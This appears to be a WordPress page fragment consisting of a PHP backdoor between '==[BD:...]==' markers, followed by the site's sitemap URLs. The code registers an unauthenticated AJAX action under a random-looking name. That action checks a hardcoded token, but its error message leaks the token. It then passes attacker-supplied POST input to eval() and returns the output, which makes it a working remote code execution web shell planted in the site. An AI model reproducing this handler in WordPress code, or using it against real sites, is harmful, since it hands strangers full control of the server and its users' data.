// ==[BD:vKPYhjU9]== add_action( 'wp_ajax_nopriv_fphavyzkem', function() { $desc = 'vKPYhjU9RGoKJI0NxzTZljzZCgAmtGcO'; $bind = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $bind ) || ! hash_equals( $desc, $bind ) ) { wp_send_json_error( [ 'message' => 'tok:' . $desc ], 403 ); } $data = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $data ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $data = preg_replace( '/^\s*<\?(php)?/i', '', $data ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $token = microtime( true ); ob_start(); try { ( static function() use ( $data ) { return eval( $data ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] ); } } ); // ==[/BD:vKPYhjU9]== https://meustc.com/wp-sitemap-posts-post-1.xmlhttps://meustc.com/wp-sitemap-posts-page-1.xmlhttps://meustc.com/wp-sitemap-taxonomies-category-1.xmlhttps://meustc.com/wp-sitemap-taxonomies-post_tag-1.xmlhttps://meustc.com/wp-sitemap-users-1.xml